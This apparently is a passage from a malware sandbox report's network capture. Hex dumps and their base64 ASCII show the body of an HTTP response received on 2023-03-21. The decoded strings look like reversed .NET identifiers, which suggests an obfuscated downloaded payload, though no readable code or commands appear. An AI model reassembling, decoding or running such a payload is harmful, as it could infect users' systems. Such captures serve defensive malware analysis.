                                                                            Data Ascii: GVnbmFoQ2V0YXRTX2RkYQB0ZXNzYXRpY2lscHhlAHJldHRlU251UgByZXR0ZVN0c29QAHJldHRlU3JldHNpZ2VSAHJldHRlU2V0YWRpbGFWAHJldHRlU2VkdWxjbkkAbGVkb010ZXNzQQBsZWRvTWVnYW5hTQByZXR0ZVN0Y2VsZmVSAHJldHRlU3RudW9DAHJldHRlU3R1b2dvTAByZXR0ZVN0aW5JAHJldHRlU3BvUAByZXR0ZVNlbGJhc2lE
                                                                            2023-03-21 08:11:06 UTC2818INData Raw: 6d 56 77 62 33 4a 51 5a 58 52 68 62 48 56 6a 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 55 67 42 35 64 48 4a 6c 63 47 39 79 55 47 68 6a 64 47 46 51 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 48 4a 68 64 46 4d 41 65 58 52 79 5a 58 42 76 63 6c 42 73 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 5a 47 6c 73 59 56 59 41 65 58 52 79 5a 58 42 76 63 6c 42 6c 63 6d 46 77 62 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 56 54 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 78 76 51 77 42 35 64 48 4a 6c 63 47 39 79 55 48 52 75 64 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 6c 62 47 56 45 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 35 70 63 6c 41 41 65 58 52 79 5a 58 42 76 63 6c 42 30 64 57 39 6e 62 30 77 41
                                                                            Data Ascii: mVwb3JQZXRhbHVjbGFDAHl0cmVwb3JQZXRhUgB5dHJlcG9yUGhjdGFQAHl0cmVwb3JQdHJhdFMAeXRyZXBvclBsbGFDAHl0cmVwb3JQZXRhZGlsYVYAeXRyZXBvclBlcmFwbW9DAHl0cmVwb3JQdGNlbGVTAHl0cmVwb3JQdGNlbGxvQwB5dHJlcG9yUHRudW9DAHl0cmVwb3JQZXRlbGVEAHl0cmVwb3JQdG5pclAAeXRyZXBvclB0dW9nb0wA
                                                                            2023-03-21 08:11:06 UTC2834INData Raw: 56 52 30 62 32 64 79 62 30 59 41 61 33 4e 68 56 47 68 6a 63 6d 46 6c 55 77 42 72 63 32 46 55 63 47 46 4e 41 47 74 7a 59 56 52 30 59 32 56 73 5a 56 4d 41 61 33 4e 68 56 48 52 6a 5a 57 78 73 62 30 4d 41 61 33 4e 68 56 47 56 73 59 6d 46 7a 61 55 51 41 61 33 4e 68 56 47 56 30 59 57 78 31 59 32 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 55 67 42 72 63 32 46 55 61 47 4e 30 59 56 41 41 63 32 56 31 62 47 46 57 5a 47 46 76 62 48 42 56 41 47 74 7a 59 56 52 30 63 6d 46 30 55 77 42 72 63 32 46 55 62 47 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 5a 47 6c 73 59 56 59 41 61 33 4e 68 56 47 56 79 59 58 42 74 62 30 4d 41 5a 57 31 70 56 47 78 68 63 33 4a 6c 64 6d 6c 75 56 57 39 55 41 48 64 76 54 6c 39 30 5a 57 63 41 5a 47 52 42 41 47 56 74 61 56 52 6c 64 47 46 45 41 47 52 6c
                                                                            Data Ascii: VR0b2dyb0YAa3NhVGhjcmFlUwBrc2FUcGFNAGtzYVR0Y2VsZVMAa3NhVHRjZWxsb0MAa3NhVGVsYmFzaUQAa3NhVGV0YWx1Y2xhQwBrc2FUZXRhUgBrc2FUaGN0YVAAc2V1bGFWZGFvbHBVAGtzYVR0cmF0UwBrc2FUbGxhQwBrc2FUZXRhZGlsYVYAa3NhVGVyYXBtb0MAZW1pVGxhc3JldmluVW9UAHdvTl90ZWcAZGRBAGVtaVRldGFEAGRl
                                                                            2023-03-21 08:11:06 UTC2850INData Raw: 46 46 54 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 4a 45 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 56 30 61 55 78 52 55 77 42 7a 64 47 35 68 64 48 4e 75 62 30 4e 6c 62 6d 6c 6d 5a 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 30 64 47 56 54 5a 58 52 68 5a 47 6c 6b 62 6d 46 44 41 48 4a 6c 5a 47 46 6c 55 6d 46 30 59 55 52 69 52 41 42 79 5a 57 52 68 5a 56 4a 68 64 47 46 45 5a 58 52 70 54 46 46 54 41 48 4a 6c 64 48 42 68 5a 45 46 68 64 47 46 45 59 6b 51 41 63 6d 56 30 63 47 46 6b 51 57 46 30 59 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 79 59 58 42 74 62 30 4e 6e 62 6d 6c 79 64 46 4e 6c 62 57 46 4f 5a 58 42 35 56 41 42 6e 62 6d 6c 77 63 47 46 4e 5a 58 42 35 56 47 4a 45 5a 58 52 70 54 46 46 54 41 48 42 68 54 57 56 77 65 56 52 69 52 47 56 30 61 55 78 52 55 77 42 6c
                                                                            Data Ascii: FFTAG5vaXRwZWN4RWJEAG5vaXRwZWN4RWV0aUxRUwBzdG5hdHNub0NlbmlmZURldGlMUVMAcmV0dGVTZXRhZGlkbmFDAHJlZGFlUmF0YURiRAByZWRhZVJhdGFEZXRpTFFTAHJldHBhZEFhdGFEYkQAcmV0cGFkQWF0YURldGlMUVMAcmVyYXBtb0NnbmlydFNlbWFOZXB5VABnbmlwcGFNZXB5VGJEZXRpTFFTAHBhTWVweVRiRGV0aUxRUwBl
                                                                            2023-03-21 08:11:06 UTC2866INData Raw: 52 51 42 44 51 45 4f 41 51 77 42 44 51 45 4c 41 51 77 42 42 67 45 48 41 51 55 42 42 67 45 45 41 51 55 42 41 77 45 45 41 51 45 42 41 77 44 2b 41 4e 4d 41 2f 51 44 53 41 50 59 41 30 51 44 72 41 4e 41 41 36 51 44 4f 41 4f 67 41 79 41 44 69 41 4d 63 41 34 41 43 2b 41 4e 38 41 75 41 44 64 41 4c 55 41 31 41 43 79 41 4e 41 41 73 51 43 6f 41 4b 49 41 67 41 43 43 41 48 73 41 66 67 42 34 41 48 73 41 63 77 42 36 41 48 49 41 65 51 42 73 41 48 59 41 59 51 42 31 41 45 30 41 61 51 41 2f 41 47 67 41 50 67 42 6c 41 44 30 41 5a 41 41 37 41 46 73 41 4e 77 42 57 41 44 59 41 50 77 41 31 41 44 6f 41 4d 77 41 35 41 43 38 41 4b 51 41 72 41 43 67 41 4a 67 41 6e 41 41 51 41 49 77 41 42 41 43 49 44 4e 41 41 41 32 35 34 41 41 41 4d 30 41 41 44 62 6e 67 41 41 41 4e 59 41 41 4d 6c 67
                                                                            Data Ascii: RQBDQEOAQwBDQELAQwBBgEHAQUBBgEEAQUBAwEEAQEBAwD+ANMA/QDSAPYA0QDrANAA6QDOAOgAyADiAMcA4AC+AN8AuADdALUA1ACyANAAsQCoAKIAgACCAHsAfgB4AHsAcwB6AHIAeQBsAHYAYQB1AE0AaQA/AGgAPgBlAD0AZAA7AFsANwBWADYAPwA1ADoAMwA5AC8AKQArACgAJgAnAAQAIwABACIDNAAA254AAAM0AADbngAAANYAAMlg
                                                                            2023-03-21 08:11:06 UTC2882INData Raw: 6c 59 48 55 54 33 36 41 41 43 78 79 41 61 5a 50 65 4d 41 41 43 72 51 41 61 6b 39 79 67 41 41 56 7a 77 45 61 54 67 57 41 41 43 68 6d 41 45 78 50 63 51 41 41 44 67 67 42 78 6b 39 70 67 41 41 6e 34 59 42 2b 54 68 71 41 41 42 55 66 41 44 70 4f 44 51 41 41 43 5a 54 42 78 6b 41 4e 77 41 41 4e 6c 59 44 38 54 31 38 41 41 41 6c 6c 51 4a 5a 41 44 63 41 41 44 5a 57 41 54 45 41 4e 77 41 41 4a 75 49 47 4b 54 31 32 41 41 42 56 43 51 42 42 41 44 63 41 41 47 70 56 41 4e 51 48 74 41 41 41 55 47 6f 41 31 41 65 30 41 41 42 51 61 67 44 63 44 78 67 41 41 49 68 44 41 69 6b 48 76 41 41 41 72 42 4d 47 4b 51 65 34 41 41 43 67 56 51 45 78 50 53 30 41 41 42 77 77 42 76 45 39 4b 41 41 41 4b 48 63 42 49 51 52 66 41 41 43 6f 36 41 5a 35 50 47 51 41 41 44 71 57 42 73 45 45 58 77 41 41
                                                                            Data Ascii: lYHUT36AACxyAaZPeMAACrQAak9ygAAVzwEaTgWAAChmAExPcQAADggBxk9pgAAn4YB+ThqAABUfADpODQAACZTBxkANwAANlYD8T18AAAllQJZADcAADZWATEANwAAJuIGKT12AABVCQBBADcAAGpVANQHtAAAUGoA1Ae0AABQagDcDxgAAIhDAikHvAAArBMGKQe4AACgVQExPS0AABwwBvE9KAAAKHcBIQRfAACo6AZ5PGQAADqWBsEEXwAA
                                                                            2023-03-21 08:11:06 UTC2898INData Raw: 41 44 69 4f 51 41 46 41 41 41 41 41 4f 49 30 41 41 51 41 41 41 41 42 4a 4f 51 41 41 77 41 41 41 41 45 6b 33 51 41 43 41 41 41 41 41 53 54 56 41 41 45 41 41 41 41 42 4a 4e 55 41 41 51 41 41 41 41 45 6b 31 51 41 43 41 41 41 41 41 53 54 49 41 41 45 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 6b 79 41 41 42 41 41 41 41 41 53 54 4f 41 41 49 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41
                                                                            Data Ascii: ADiOQAFAAAAAOI0AAQAAAABJOQAAwAAAAEk3QACAAAAASTVAAEAAAABJNUAAQAAAAEk1QACAAAAASTIAAEAAAABJMgAAQAAAAEkyAABAAAAASTOAAIAAAABJMgAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAA
                                                                            2023-03-21 08:11:06 UTC2914INData Raw: 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41
                                                                            Data Ascii: AAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAA
                                                                            2023-03-21 08:11:06 UTC2930INData Raw: 41 42 53 42 67 41 43 41 41 41 41 41 45 6a 53 41 41 45 41 41 41 41 41 55 64 41 41 41 77 41 41 41 41 42 52 79 41 41 43 41 41 41 41 41 43 39 4e 41 41 45 41 41 41 41 41 4e 49 49 41 41 77 41 41 41 41 42 52 73 77 41 43 41 41 41 41 41 44 2f 7a 41 41 45 41 41 41 41 41 52 75 41 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 52 41 41 45 41 41 41 41 41 55 56 45 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 43 41 41 45 41 41 41 41 41 55 45 38 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 46 42 50 41 41 45 41 41 41 41 41 55 4d 59 41 41 77 41 41 41 41 42 51 70 67 41 43 41 41 41 41 41 46 43 69 41 41 45 41 41 41 41 41 55 4b 59 41 41 67 41 41 41 41 42 51 6f 67 41 42 41 41 41 41 41 46 43 48 41 41 51 41 41 41 41 41 55 48 30 41 41 77 41 41
                                                                            Data Ascii: ABSBgACAAAAAEjSAAEAAAAAUdAAAwAAAABRyAACAAAAAC9NAAEAAAAANIIAAwAAAABRswACAAAAAD/zAAEAAAAARuAAAQAAAABRUQABAAAAAFFRAAEAAAAAUVEAAQAAAABRUQABAAAAAFFCAAEAAAAAUE8AAQAAAAAeCAABAAAAAFBPAAEAAAAAUMYAAwAAAABQpgACAAAAAFCiAAEAAAAAUKYAAgAAAABQogABAAAAAFCHAAQAAAAAUH0AAwAA
                                                                            2023-03-21 08:11:06 UTC2946INData Raw: 4d 59 41 41 41 41 4a 57 61 41 51 6f 57 67 59 41 41 45 37 34 51 44 47 41 41 41 41 43 56 6d 41 45 4a 78 6f 47 41 41 41 4a 5a 55 41 78 67 41 41 41 41 6c 5a 61 42 43 61 62 4a 45 41 41 55 71 49 41 63 51 41 41 41 41 4a 57 4b 51 51 6d 57 79 4b 41 41 46 4b 64 41 48 45 41 41 41 41 43 56 65 51 45 4a 68 73 67 77 41 42 53 6c 55 42 78 41 41 41 41 41 6c 58 4c 42 43 58 62 49 4d 41 41 55 6f 30 41 63 51 41 41 41 41 4a 56 78 77 51 6c 78 75 72 41 41 46 4b 48 77 48 45 41 41 41 41 43 56 63 59 45 4a 59 41 71 51 41 41 41 46 6f 59 68 67 41 41 41 41 6c 57 76 42 43 57 43 55 41 41 41 55 6e 6a 41 4a 4d 41 41 41 41 4a 56 72 41 51 6c 67 61 31 41 41 46 4a 31 41 43 54 41 41 41 41 43 56 61 6b 45 4a 52 73 59 41 41 42 53 63 55 41 6b 77 41 41 41 41 6c 57 6b 42 43 53 62 46 63 41 41 55 6d 31
                                                                            Data Ascii: MYAAAAJWaAQoWgYAAE74QDGAAAACVmAEJxoGAAAJZUAxgAAAAlZaBCabJEAAUqIAcQAAAAJWKQQmWyKAAFKdAHEAAAACVeQEJhsgwABSlUBxAAAAAlXLBCXbIMAAUo0AcQAAAAJVxwQlxurAAFKHwHEAAAACVcYEJYAqQAAAFoYhgAAAAlWvBCWCUAAAUnjAJMAAAAJVrAQlga1AAFJ1ACTAAAACVakEJRsYAABScUAkwAAAAlWkBCSbFcAAUm1
                                                                            2023-03-21 08:11:06 UTC2962INData Raw: 4a 4d 41 41 41 41 49 63 4b 77 4e 47 51 4f 73 41 41 45 6a 64 51 43 54 41 41 41 41 43 48 43 6b 44 52 6b 44 72 41 41 42 49 32 49 41 6b 77 41 41 41 41 68 77 6e 41 30 5a 46 65 51 41 41 53 4e 4f 41 4a 4d 41 41 41 41 49 63 49 67 4e 47 52 74 30 41 41 45 6a 4f 77 43 54 41 41 41 41 43 48 42 34 44 52 6b 56 33 67 41 42 49 79 6b 41 6b 77 41 41 41 41 68 77 61 41 30 5a 41 31 59 41 41 53 4d 45 41 4a 4d 41 41 41 41 49 63 46 77 4e 47 54 33 51 41 41 45 69 38 51 43 54 41 41 41 41 43 48 42 49 44 52 6c 68 55 67 41 42 49 75 41 41 6b 77 41 41 41 41 68 77 4e 41 30 5a 41 31 59 41 41 53 4c 4c 41 4a 4d 41 41 41 41 49 63 43 67 4e 47 51 4e 57 41 41 45 69 6e 67 43 54 41 41 41 41 43 48 41 63 44 52 6b 44 6b 51 41 42 49 6f 73 41 6b 77 41 41 41 41 68 77 44 41 30 5a 43 4d 41 41 41 53 4a 33
                                                                            Data Ascii: JMAAAAIcKwNGQOsAAEjdQCTAAAACHCkDRkDrAABI2IAkwAAAAhwnA0ZFeQAASNOAJMAAAAIcIgNGRt0AAEjOwCTAAAACHB4DRkV3gABIykAkwAAAAhwaA0ZA1YAASMEAJMAAAAIcFwNGT3QAAEi8QCTAAAACHBIDRlhUgABIuAAkwAAAAhwNA0ZA1YAASLLAJMAAAAIcCgNGQNWAAEingCTAAAACHAcDRkDkQABIosAkwAAAAhwDA0ZCMAAASJ3
                                                                            2023-03-21 08:11:06 UTC2978INData Raw: 49 59 41 41 41 41 48 55 34 41 4a 63 56 47 71 41 41 44 67 48 77 43 54 41 41 41 41 42 31 4e 6b 43 57 35 52 6e 41 41 41 34 42 49 41 6b 77 41 41 41 41 64 54 4d 41 6c 75 55 5a 55 41 41 4f 41 48 41 4a 4d 41 41 41 41 48 55 79 51 4a 62 53 67 34 41 41 44 66 2b 41 43 54 41 41 41 41 42 31 4d 4d 43 57 30 5a 49 77 41 41 33 2b 77 41 6b 77 41 41 41 41 64 53 2f 41 6c 74 4b 53 4d 41 41 4e 2f 66 41 4a 4d 41 41 41 41 48 55 76 41 4a 62 51 4e 57 41 41 44 66 30 51 43 54 41 41 41 41 42 31 4c 6b 43 57 30 49 77 41 41 41 33 38 59 41 6b 77 41 41 41 41 64 53 31 41 6c 74 41 31 59 41 41 4e 2b 36 41 4a 4d 41 41 41 41 48 55 73 67 4a 62 51 4e 67 41 41 44 66 72 41 43 54 41 41 41 41 42 31 4b 38 43 57 30 44 56 67 41 41 33 35 38 41 6b 77 41 41 41 41 64 53 73 41 6c 74 43 55 55 41 41 4e 2b 54
                                                                            Data Ascii: IYAAAAHU4AJcVGqAADgHwCTAAAAB1NkCW5RnAAA4BIAkwAAAAdTMAluUZUAAOAHAJMAAAAHUyQJbSg4AADf+ACTAAAAB1MMCW0ZIwAA3+wAkwAAAAdS/AltKSMAAN/fAJMAAAAHUvAJbQNWAADf0QCTAAAAB1LkCW0IwAAA38YAkwAAAAdS1AltA1YAAN+6AJMAAAAHUsgJbQNgAADfrACTAAAAB1K8CW0DVgAA358AkwAAAAdSsAltCUUAAN+T
                                                                            2023-03-21 08:11:06 UTC2994INData Raw: 4a 4d 41 41 41 41 47 4a 75 77 48 48 51 61 31 41 41 43 73 69 67 43 54 41 41 41 41 42 69 62 67 42 78 30 4a 51 41 41 41 72 48 77 41 6b 77 41 41 41 41 59 6d 31 41 63 64 41 36 77 41 41 4b 78 71 41 4a 4d 41 41 41 41 47 4a 73 77 48 48 51 6c 41 41 41 43 73 57 51 43 54 41 41 41 41 42 69 62 41 42 78 30 4a 51 41 41 41 72 45 67 41 6b 77 41 41 41 41 59 6d 74 41 63 64 45 45 38 41 41 4b 77 33 41 4a 4d 41 41 41 41 47 4a 71 41 48 48 51 4e 57 41 41 43 73 4a 67 43 54 41 41 41 41 42 69 61 55 42 78 30 44 57 77 41 41 72 41 55 41 6b 77 41 41 41 41 59 6d 69 41 63 64 43 55 55 41 41 4b 76 7a 41 4a 4d 41 41 41 41 47 4a 6e 67 48 48 51 4e 57 41 41 43 72 33 77 43 54 41 41 41 41 42 69 5a 73 42 78 30 4d 6d 77 41 41 71 39 41 41 6b 77 41 41 41 41 59 6d 59 41 63 64 41 31 73 41 41 4b 76 41
                                                                            Data Ascii: JMAAAAGJuwHHQa1AACsigCTAAAABibgBx0JQAAArHwAkwAAAAYm1AcdA6wAAKxqAJMAAAAGJswHHQlAAACsWQCTAAAABibABx0JQAAArEgAkwAAAAYmtAcdEE8AAKw3AJMAAAAGJqAHHQNWAACsJgCTAAAABiaUBx0DWwAArAUAkwAAAAYmiAcdCUUAAKvzAJMAAAAGJngHHQNWAACr3wCTAAAABiZsBx0MmwAAq9AAkwAAAAYmYAcdA1sAAKvA
                                                                            2023-03-21 08:11:06 UTC3010INData Raw: 73 4d 41 41 41 41 45 4b 64 77 45 68 52 33 41 41 41 42 63 2f 41 4c 44 41 41 41 41 42 43 6d 77 42 49 51 64 75 77 41 41 58 4f 6b 43 77 77 41 41 41 41 51 70 71 41 53 44 42 68 45 41 41 46 7a 57 41 73 4d 41 41 41 41 45 4b 61 41 45 67 68 32 32 41 41 42 63 77 67 4c 44 41 41 41 41 42 43 6d 59 42 48 30 64 72 41 41 41 58 4b 4d 43 77 77 41 41 41 41 51 6e 35 41 52 37 48 59 77 41 41 46 78 49 41 73 4d 41 41 41 41 45 4a 71 67 45 64 78 32 67 41 41 42 63 58 51 4c 44 41 41 41 41 42 43 56 41 42 48 4d 64 6c 67 41 41 58 46 30 43 77 77 41 41 41 41 51 6a 78 41 52 76 48 57 73 41 41 46 76 5a 41 73 4d 41 41 41 41 45 49 73 41 45 61 42 31 35 41 41 42 63 43 41 4c 44 41 41 41 41 42 43 47 67 42 47 63 47 45 51 41 41 58 49 4d 43 77 77 41 41 41 41 51 68 6d 41 52 6c 48 50 63 41 41 46 76 53
                                                                            Data Ascii: sMAAAAEKdwEhR3AAABc/ALDAAAABCmwBIQduwAAXOkCwwAAAAQpqASDBhEAAFzWAsMAAAAEKaAEgh22AABcwgLDAAAABCmYBH0drAAAXKMCwwAAAAQn5AR7HYwAAFxIAsMAAAAEJqgEdx2gAABcXQLDAAAABCVABHMdlgAAXF0CwwAAAAQjxARvHWsAAFvZAsMAAAAEIsAEaB15AABcCALDAAAABCGgBGcGEQAAXIMCwwAAAAQhmARlHPcAAFvS
                                                                            2023-03-21 08:11:06 UTC3026INData Raw: 4a 4d 41 41 41 41 42 68 63 67 42 6b 41 4f 52 41 41 41 78 2f 77 43 54 41 41 41 41 41 59 57 34 41 5a 41 4a 76 51 41 41 4d 65 30 41 6b 77 41 41 41 41 47 46 70 41 47 50 41 34 73 41 41 44 48 63 41 4a 4d 41 41 41 41 42 68 5a 51 42 6a 77 4e 57 41 41 41 78 79 77 43 54 41 41 41 41 41 59 57 49 41 59 38 44 56 67 41 41 4d 62 6f 41 6b 77 41 41 41 41 47 46 66 41 47 50 43 55 41 41 41 44 47 69 41 4a 4d 41 41 41 41 42 68 58 41 42 6a 77 4e 57 41 41 41 78 6c 41 43 54 41 41 41 41 41 59 56 6b 41 59 38 44 56 67 41 41 4d 59 49 41 6b 77 41 41 41 41 47 46 57 41 47 50 41 35 45 41 41 44 46 6c 41 4a 4d 41 41 41 41 42 68 55 67 42 6a 77 30 6a 41 41 41 78 56 51 43 54 41 41 41 41 41 59 56 41 41 59 38 43 2f 67 41 41 4d 55 55 41 6b 77 41 41 41 41 47 46 4e 41 47 50 41 75 77 41 41 44 45 32
                                                                            Data Ascii: JMAAAABhcgBkAORAAAx/wCTAAAAAYW4AZAJvQAAMe0AkwAAAAGFpAGPA4sAADHcAJMAAAABhZQBjwNWAAAxywCTAAAAAYWIAY8DVgAAMboAkwAAAAGFfAGPCUAAADGiAJMAAAABhXABjwNWAAAxlACTAAAAAYVkAY8DVgAAMYIAkwAAAAGFWAGPA5EAADFlAJMAAAABhUgBjw0jAAAxVQCTAAAAAYVAAY8C/gAAMUUAkwAAAAGFNAGPAuwAADE2
                                                                            2023-03-21 08:11:06 UTC3042INData Raw: 61 55 41 41 4e 63 2f 67 46 59 70 70 51 41 41 31 79 32 41 56 69 6d 6c 41 41 44 58 47 34 42 57 4b 61 55 41 41 4e 63 4d 67 46 59 70 70 51 41 41 31 76 6d 41 56 69 6d 6c 41 41 44 57 37 49 42 57 4b 61 55 41 41 4e 62 65 67 46 59 70 70 51 41 41 31 74 43 41 56 69 6d 6c 41 41 44 57 78 49 42 57 4b 61 55 41 41 4e 61 78 67 46 59 70 70 51 41 41 31 71 47 41 56 69 6d 6c 41 41 44 57 6c 6f 42 57 4b 61 55 41 41 4e 61 41 67 46 59 70 70 51 41 41 31 6d 79 41 56 69 6d 6c 41 41 44 57 57 59 42 57 4b 61 55 41 41 4e 5a 4f 67 46 59 70 70 51 41 41 31 6b 4b 41 56 69 6d 6c 41 41 44 57 4d 34 42 57 4b 61 55 41 41 4e 59 68 67 46 59 70 70 51 41 41 31 68 61 41 56 69 6d 6c 41 41 44 57 41 34 42 57 4b 61 55 41 41 4e 58 34 67 46 59 70 70 51 41 41 31 65 75 41 56 69 6d 6c 41 41 44 56 33 59 42 57
                                                                            Data Ascii: aUAANc/gFYppQAA1y2AVimlAADXG4BWKaUAANcMgFYppQAA1vmAVimlAADW7IBWKaUAANbegFYppQAA1tCAVimlAADWxIBWKaUAANaxgFYppQAA1qGAVimlAADWloBWKaUAANaAgFYppQAA1myAVimlAADWWYBWKaUAANZOgFYppQAA1kKAVimlAADWM4BWKaUAANYhgFYppQAA1haAVimlAADWA4BWKaUAANX4gFYppQAA1euAVimlAADV3YBW
                                                                            2023-03-21 08:11:06 UTC3058INData Raw: 33 45 41 41 41 45 46 41 48 49 41 4c 67 42 35 41 41 41 41 41 41 41 41 41 32 67 41 41 41 45 46 41 47 34 41 49 77 42 78 41 41 41 41 41 41 41 41 41 36 30 41 45 41 47 41 41 47 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 32 41 41 41 41 45 46 41 47 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 30 51 41 41 41 45 46 41 47 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 6b 41 41 41 45 46 41 46 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 55 41 41 41 45 46 41 46 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 45 41 41 41 45 46 41 46 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 30 41 41 41 45 46 41 46 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 55 41 41 41 45 46 41 45 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 34 63 41 41 41 45 46 41 45 6f 41 49 77 42 35
                                                                            Data Ascii: 3EAAAEFAHIALgB5AAAAAAAAA2gAAAEFAG4AIwBxAAAAAAAAA60AEAGAAGoAIwB5AAAAAAAAA2AAAAEFAGYAIwB5AAAAAAAAA0QAAAEFAGIAIwB5AAAAAAAAA6kAAAEFAF4AIwB5AAAAAAAAA6UAAAEFAFoAIwB5AAAAAAAAA6EAAAEFAFYAIwB5AAAAAAAAA50AAAEFAFIAIwB5AAAAAAAAA5UAAAEFAE4AIwB5AAAAAAAAA4cAAAEFAEoAIwB5
                                                                            2023-03-21 08:11:06 UTC3074INData Raw: 48 4d 42 45 51 4c 2f 2f 2f 38 4c 4f 41 41 41 41 41 4d 67 4a 76 2f 2f 2f 78 59 36 42 41 41 46 78 6e 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 41 4e 6a 6f 4b 41 41 51 37 4b 41 51 41 42 56 35 38 41 76 2f 2f 2f 7a 6f 34 41 41 41 41 42 69 41 6d 2f 2f 2f 2f 52 54 6f 45 41 41 57 49 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 41 41 41 44 56 4f 51 6f 41 41 58 38 6f 42 41 41 46 58 58 77 43 41 41 41 42 4b 7a 67 45 41 41 56 66 66 51 6f 41 41 57 78 7a 41 66 34 57 41 66 34 57 41 68 45 43 2f 2f 2f 2f 67 54 67 41 41 41 41 42 49 43 62 2f 2f 2f 2b 4d 4f 67 51 41 42 59 39 37 42 41 41 46 78 33 34 41 41 41 41 42 49 41 51 41 42 56 78 39 42 67 41 53 65 79 67 46 45 51 4a 36 42 67 41 4b 52 6e 4e 77 41 4c 5a 79 63 67 51 52 41 41 41 41 78 6a 67 41 41 41 43 30 41 41 41 42
                                                                            Data Ascii: HMBEQL///8LOAAAAAMgJv///xY6BAAFxnsEAAXHfgAAAAogAAAANjoKAAQ7KAQABV58Av///zo4AAAABiAm////RToEAAWIewQABcd+AAAAAiAAAADVOQoAAX8oBAAFXXwCAAABKzgEAAVffQoAAWxzAf4WAf4WAhEC////gTgAAAABICb///+MOgQABY97BAAFx34AAAABIAQABVx9BgASeygFEQJ6BgAKRnNwALZycgQRAAAAxjgAAAC0AAAB
                                                                            2023-03-21 08:11:06 UTC3090INData Raw: 41 59 41 45 66 63 6f 41 77 51 41 42 54 64 37 41 76 2f 2f 2f 35 73 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 70 6a 6b 45 41 41 57 62 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64 4b 41 4c 2f 2f 2f 2f 41 4f 41 41 41 41 41 45 67 4a 76 2f 2f 2f 38 73 35 42 41 41 46 76 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 41 41 41 65 54 6b 42 45 51 41 41 41 45 73 34 41 41 41 41 61 41 41 41 41 43 73 41 41 41 42 34 41 41 41 41 55 41 41 41 41 41 52 46 41 41 41 4d 2f 67 41 41 41 41 41 34 41 41 41 4f 2f 67 41 41 41 41 4d 67 45 51 41 41 68 67 41 41 41 4b 30 41 41 7a 41 54 41 43 6f 47 41 41 32 42 4b 41 51 41 42 54 64 37 41 76 2f 2f 2f 38 49 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 7a 54 6b 45 41 41 57 39 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64
